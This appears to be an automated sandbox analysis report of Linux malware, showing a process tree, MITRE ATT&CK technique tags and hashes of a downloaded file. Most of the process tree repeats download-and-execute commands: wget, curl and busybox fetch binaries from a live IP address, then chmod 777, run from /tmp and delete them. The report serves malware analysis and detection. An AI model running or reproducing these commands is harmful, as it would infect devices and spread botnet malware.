/bin/chmodchmod 777 VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS2⤵
- File and Directory Permissions Modification
PID:840
-
-
/tmp/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS./VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS2⤵
- Executes dropped EXE
PID:841
-
-
/bin/rmrm VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS2⤵PID:842
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd2⤵PID:843
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:844
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd2⤵PID:845
-
-
/bin/chmodchmod 777 fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd2⤵
- File and Directory Permissions Modification
PID:846
-
-
/tmp/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd./fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd2⤵
- Executes dropped EXE
PID:847
-
-
/bin/rmrm fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd2⤵PID:848
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS2⤵PID:849
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:850
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS2⤵PID:851
-
-
/bin/chmodchmod 777 H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS2⤵
- File and Directory Permissions Modification
PID:852
-
-
/tmp/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS./H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS2⤵
- Executes dropped EXE
PID:853
-
-
/bin/rmrm H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS2⤵PID:854
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I2⤵PID:855
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:856
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I2⤵PID:857
-
-
/bin/chmodchmod 777 YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I2⤵
- File and Directory Permissions Modification
PID:858
-
-
/tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I./YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I2⤵
- Executes dropped EXE
PID:859
-
-
/bin/rmrm YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I2⤵PID:860
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed2⤵PID:861
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:862
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed2⤵PID:863
-
-
/bin/chmodchmod 777 RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed2⤵
- File and Directory Permissions Modification
PID:864
-
-
/tmp/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed./RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed2⤵
- Executes dropped EXE
PID:865
-
-
/bin/rmrm RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed2⤵PID:866
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE2⤵PID:867
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:868
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE2⤵PID:869
-
-
/bin/chmodchmod 777 1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE2⤵
- File and Directory Permissions Modification
PID:870
-
-
/tmp/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE./1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE2⤵
- Executes dropped EXE
PID:871
-
-
/bin/rmrm 1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE2⤵PID:872
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ2⤵PID:873
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:874
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ2⤵PID:875
-
-
/bin/chmodchmod 777 wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ2⤵
- File and Directory Permissions Modification
PID:876
-
-
/tmp/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ./wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ2⤵
- Executes dropped EXE
PID:877
-
-
/bin/rmrm wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ2⤵PID:878
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi2⤵PID:879
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:883
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi2⤵PID:885
-
-
/bin/chmodchmod 777 4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi2⤵
- File and Directory Permissions Modification
PID:887
-
-
/tmp/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi./4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi2⤵
- Executes dropped EXE
PID:888
-
-
/bin/rmrm 4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi2⤵PID:889
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak2⤵PID:890
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:891
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak2⤵PID:892
-
-
/bin/chmodchmod 777 H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak2⤵
- File and Directory Permissions Modification
PID:893
-
-
/tmp/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak./H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak2⤵
- Executes dropped EXE
PID:894
-
-
/bin/rmrm H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak2⤵PID:895
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ2⤵PID:896
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:897
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ2⤵PID:898
-
-
/bin/chmodchmod 777 cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ2⤵
- File and Directory Permissions Modification
PID:899
-
-
/tmp/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ./cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ2⤵
- Executes dropped EXE
PID:900
-
-
/bin/rmrm cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ2⤵PID:901
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F2⤵
- System Network Configuration Discovery
PID:902
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:903
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F2⤵
- System Network Configuration Discovery
PID:904
-
-
/bin/chmodchmod 777 KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F2⤵
- File and Directory Permissions Modification
PID:905
-
-
/tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F./KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:906
-
-
/bin/rmrm KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F2⤵
- System Network Configuration Discovery
PID:907
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L2⤵PID:908
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:909
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L2⤵PID:910
-
-
/bin/chmodchmod 777 IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L2⤵
- File and Directory Permissions Modification
PID:911
-
-
/tmp/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L./IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L2⤵
- Executes dropped EXE
PID:912
-
-
/bin/rmrm IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L2⤵PID:913
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG2⤵PID:914
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:915
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG2⤵PID:916
-
-
/bin/chmodchmod 777 FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG2⤵
- File and Directory Permissions Modification
PID:917
-
-
/tmp/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG./FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG2⤵
- Executes dropped EXE
PID:918
-
-
/bin/rmrm FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG2⤵PID:919
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt2⤵PID:920
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:921
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt2⤵PID:922
-
-
/bin/chmodchmod 777 ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt2⤵
- File and Directory Permissions Modification
PID:923
-
-
/tmp/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt./ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt2⤵
- Executes dropped EXE
PID:924
-
-
/bin/rmrm ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt2⤵PID:925
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97